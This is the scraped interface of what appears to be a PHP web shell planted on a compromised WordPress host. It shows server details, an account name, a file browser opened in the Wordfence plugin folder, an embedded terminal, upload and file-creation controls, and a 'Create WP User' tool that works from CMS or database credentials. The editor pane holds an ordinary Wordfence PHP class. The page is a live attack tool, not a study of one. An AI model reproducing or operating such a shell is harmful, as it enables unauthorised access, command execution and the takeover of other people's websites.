Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
wordfence
/
modules
/
login-security
/
classes
/
model
/
view
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
tab.php
920.00 B
-rw-r--r--
2026-02-24 12:20
title.php
893.00 B
-rw-r--r--
2026-02-24 12:20
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
title.php
<?php namespace WordfenceLS\View; /** * Class Model_Title * @package Wordfence2FA\Page * @var string $id A valid DOM ID for the title. * @var string|Model_HTML $title The title text or HTML. * @var string $helpURL The help URL. * @var string|Model_HTML $helpLink The text/HTML of the help link. */ class Model_Title { private $_id; private $_title; private $_helpURL; private $_helpLink; public function __construct($id, $title, $helpURL = null, $helpLink = null) { $this->_id = $id; $this->_title = $title; $this->_helpURL = $helpURL; $this->_helpLink = $helpLink; } public function __get($name) { switch ($name) { case 'id': return $this->_id; case 'title': return $this->_title; case 'helpURL': return $this->_helpURL; case 'helpLink': return $this->_helpLink; } throw new \OutOfBoundsException('Invalid key: ' . $name); } }
关闭
保存